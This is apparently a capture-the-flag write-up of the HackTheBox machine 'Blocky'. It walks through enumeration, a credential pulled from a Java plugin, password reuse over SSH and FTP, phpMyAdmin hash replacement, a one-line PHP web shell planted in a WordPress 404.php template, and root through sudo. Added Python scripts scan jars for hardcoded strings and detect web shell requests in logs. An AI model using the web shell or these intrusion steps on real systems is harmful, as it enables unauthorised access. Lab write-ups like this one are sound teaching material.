Write-up of the Blocky machine from HTB

Today I’ll take a look at Blocky, where we will explore the easy-rated machine inspired by Minecraft.

Echo_Slow
InfoSec Write-ups


Short Summary

  • Nmap enumeration for open ports
  • Directory busting for additional information
  • Reversing a Java .class file
  • Password reuse, and multiple initial access paths
  • Simple privilege escalation via sudo -l

Enumeration

We run a port scan with the following command:

sudo nmap -p- -T4 --min-rate 2500 10.10.10.37

and find the following ports open:

PORT      STATE  SERVICE   REASON
21/tcp    open   ftp       syn-ack ttl 63
22/tcp    open   ssh       syn-ack ttl 63
80/tcp    open   http      syn-ack ttl 63
8192/tcp  closed sophos    reset ttl 63
25565/tcp open   minecraft syn-ack ttl 63

Further enumeration of these ports gives us additional information:

PORT      STATE    SERVICE   REASON         VERSION
20/tcp    filtered ftp-data  no-response
21/tcp    open     ftp       syn-ack ttl 63 ProFTPD 1.3.5a
80/tcp    open     http      syn-ack ttl 63 Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://blocky.htb
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
8192/tcp  closed   sophos    reset ttl 63
25565/tcp open     minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OS: Unix

Since FTP is open we can try anonymous login.

Sadly no luck with the anonymous login.

Next on our list is port 80, or the HTTP server. Nmap already showed us that the hostname is blocky.htb, so we need to edit our /etc/hosts and add the following entry:

10.10.10.37 blocky.htb

Once we have done that, we can visit the website at http://blocky.htb.

The website

At the bottom of the website, we see “Proudly powered by WordPress”. This hints that we should run wpscan. The following command was used for wpscan:

wpscan --url http://blocky.htb -e u

The goal was to enumerate users, and wpscan found a user named “notch”. We could have also found out about “notch” if we opened the post made on the website:

Manually finding the username

Once we have a username, we can try to brute-force the login page. wpscan supports brute-forcing, but it found no valid password.

Since this is a website, we can try directory busting with Feroxbuster:

feroxbuster --url http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -C 404 -n

by Ben "epi" Risher 🤓 ver: 2.9.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://blocky.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
💢 Status Code Filters │ [404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🚫 Do Not Recurse │ true
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET -l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 313l 3592w 52227c http://blocky.htb/
301 GET 9l 28w 307c http://blocky.htb/wiki => http://blocky.htb/wiki/
301 GET 9l 28w 313c http://blocky.htb/wp-content => http://blocky.htb/wp-content/
301 GET 9l 28w 310c http://blocky.htb/plugins => http://blocky.htb/plugins/
301 GET 9l 28w 314c http://blocky.htb/wp-includes => http://blocky.htb/wp-includes/
301 GET 9l 28w 313c http://blocky.htb/javascript => http://blocky.htb/javascript/
301 GET 9l 28w 311c http://blocky.htb/wp-admin => http://blocky.htb/wp-admin/
301 GET 9l 28w 313c http://blocky.htb/phpmyadmin => http://blocky.htb/phpmyadmin/
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_blocky_htb-1682175911.state ...
[####>---------------] - 1m 52973/220546 3m found:8 errors:0
[####>---------------] - 1m 52972/220546 814/s http://blocky.htb/

To explain the command:

  • --url (or -u) is the URL of our target.
  • -w is the path to our wordlist, in this case, directory-list-2.3-medium.txt.
  • -C 404 filters out pages that return the HTTP status code 404.
  • -n stops recursive brute forcing (actually missed a directory when I didn’t use this option).

We see a few directories, of which /wiki, /plugins, and /phpmyadmin contain juicy information.

When we take a look at the wiki page, we see mentions of a plugin.

The wiki directory on the blocky.htb website.

Going to the plugins directory, we can find 2 .jar files. We can download those and decompile them to see if anything is interesting there.

The .jar files.

Downloading and unzipping the BlockyCore.jar file, we see a BlockyCore.class file. We can look through its contents either via cat:

Text that mentions “root” and a string that looks like a password.

or we can use jd-gui to decompile the file:

This proves that we were correct about the password string.
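As an added example (not code from the original post), the following Python script does in a repeatable way what cat and jd-gui showed above: it walks the constant pool of every .class inside a jar and lists the string literals, which is exactly where a hardcoded credential like the one in BlockyCore.class ends up. It is the kind of check to run on plugin jars before they are published. The jar and the credential it contains are constructed here, not the real BlockyCore.jar.

```python
import io
import struct
import zipfile

# Payload size per fixed-size constant-pool tag (JVM spec 4.4);
# Utf8 (tag 1) is variable-length and handled separately.
FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
              12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def class_strings(data: bytes) -> list[str]:
    """Literal strings (CONSTANT_String entries) of one .class file; hardcoded
    credentials live here, while field/method names are plain Utf8 and are skipped."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]
    pos, idx, utf8, refs = 10, 1, {}, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                           # CONSTANT_Utf8: u2 length + bytes
            length = struct.unpack(">H", data[pos:pos + 2])[0]
            utf8[idx] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        else:
            if tag == 8:                       # CONSTANT_String: u2 index of a Utf8
                refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += FIXED_SIZE[tag]
        idx += 2 if tag in (5, 6) else 1       # Long/Double occupy two pool slots
    return [utf8[i] for i in refs if i in utf8]

def scan_jar(jar_bytes: bytes) -> dict[str, list[str]]:
    """Map every .class inside a jar (a zip archive) to its string literals."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                result[name] = class_strings(jar.read(name))
    return result

def build_sample_jar() -> bytes:
    # Constructed stand-in for a plugin jar: one class whose constant pool holds
    # a hardcoded user and password next to an ordinary class reference.
    def u8(s): return b"\x01" + struct.pack(">H", len(s)) + s.encode()
    pool = (u8("root") + u8("sample-password-CONSTRUCTED")      # #1, #2
            + b"\x08\x00\x01" + b"\x08\x00\x02"                  # #3, #4: String -> #1, #2
            + u8("java/lang/Object") + b"\x07\x00\x05"           # #5, #6: Class -> #5
            + b"\x05" + bytes(8))                                # #7 (+#8): Long
    cls = b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", 9) + pool
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("BlockyCore.class", cls)
    return buf.getvalue()
```

Running scan_jar(build_sample_jar()) reports the user and password literals while leaving out the java/lang/Object class reference; on a real jar the same call walks every class in the archive.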

Well, we have a username and a password, let’s try to log in to FTP or SSH as the root user…yeah…no. We are not that lucky.

But we still have the user “notch”, and it is always important to try every combination of the credentials we have found.

Initial access

This machine offers a few ways to obtain a shell on the target system. I’ll go through each of them.

# First path

Since we have a user “notch” and a password, we can try to use those to log in via SSH.

The simplest way of obtaining a shell.

# Second path

The second way is to access FTP as the same user with the same password. This won’t allow you to gain root as FTP itself doesn’t provide an interactive shell, but you can still obtain the user.txt.

Using FTP to access user.txt.

A little tip when accessing files via FTP: when downloading a file, you can pass - as the local filename to print its contents directly to the terminal. For example, get user.txt - will print the contents of user.txt.

# Third path

There is still /phpmyadmin, which we never checked. The page asks us to log in, and the root credentials recovered from the .jar file work here. Once in, there is a database containing the WordPress password hash for the “notch” user.

phpMyAdmin dashboard.

To exploit this, we first need to generate a new hash in the WordPress format. There are multiple ways to do this; I used this website. Having generated a hash, we replace the one stored in the database. Once changed, we can log in to WordPress as the “notch” user.

Once inside, we head to the 404.php template.

We can add our simple PHP payload inside the template:

<?php system($_GET['c']);?>

After that, the file is located at /wp-content/themes/twentyseventeen/404.php. As shown in my previous blog post (not associated with the CVE), this creates a web shell that will execute any command passed via the “c” parameter.

We have command execution as www-data.

Next, we would just execute a reverse shell and continue from there. Make sure to URL encode any command that has spaces or special characters.

Again, bad OPSEC. Anyone can access this file, and as such it seriously damages the company’s security. Don’t do this in real-life scenarios.
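From the defender’s side, as an added example that is not part of the original post: a detection pass over Apache access logs for the web shell pattern described above, namely direct requests to a theme or plugin PHP file that carry a command parameter. The log lines and IP addresses are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines: two ordinary requests and two hits
# on the modified 404.php template from the post (IP addresses are made up).
SAMPLE_LOG = """\
10.10.14.2 - - [22/Apr/2023:18:05:11 +0000] "GET /wiki/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.2 - - [22/Apr/2023:18:05:40 +0000] "GET /does-not-exist HTTP/1.1" 404 52227 "-" "Mozilla/5.0"
10.10.14.9 - - [22/Apr/2023:18:07:02 +0000] "GET /wp-content/themes/twentyseventeen/404.php?c=id HTTP/1.1" 200 61 "-" "curl/7.88.1"
10.10.14.9 - - [22/Apr/2023:18:07:30 +0000] "GET /wp-content/themes/twentyseventeen/404.php?c=uname%20-a HTTP/1.1" 200 112 "-" "curl/7.88.1"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# WordPress includes theme/plugin PHP files itself; a browser normally never
# requests one directly, let alone with query parameters attached.
DIRECT_PHP = re.compile(r'^/wp-content/(themes|plugins)/.+\.php$')

def find_webshell_hits(log_text: str) -> list[dict]:
    """Return direct, parameterised requests to theme/plugin PHP files."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # not a combined-format line
        url = urlsplit(m["target"])
        if not DIRECT_PHP.match(url.path):
            continue
        args = parse_qs(url.query)            # also URL-decodes the values
        if not args:
            continue
        hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                     "path": url.path, "args": args})
    return hits
```

The two flagged entries show the decoded command strings, so an analyst sees uname -a rather than uname%20-a; feeding real logs through the same function is a one-line change.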

Privilege escalation

When you have a user’s password, it’s advised to always run sudo -l to check whether that user can run any command as root.

In this case, we can run anything as root.

We simply run sudo su and gain a shell as root.

And with that, we rooted the Blocky machine.

Conclusion

When hosting files, make sure there are no credentials in them. If credentials need to be in a file, at least don’t reuse the same password for multiple purposes. Password reuse (which enables credential stuffing) is still covered by the OWASP Top 10.

If you have learned anything new or found the post helpful, consider giving the post a clap and following me for additional posts.
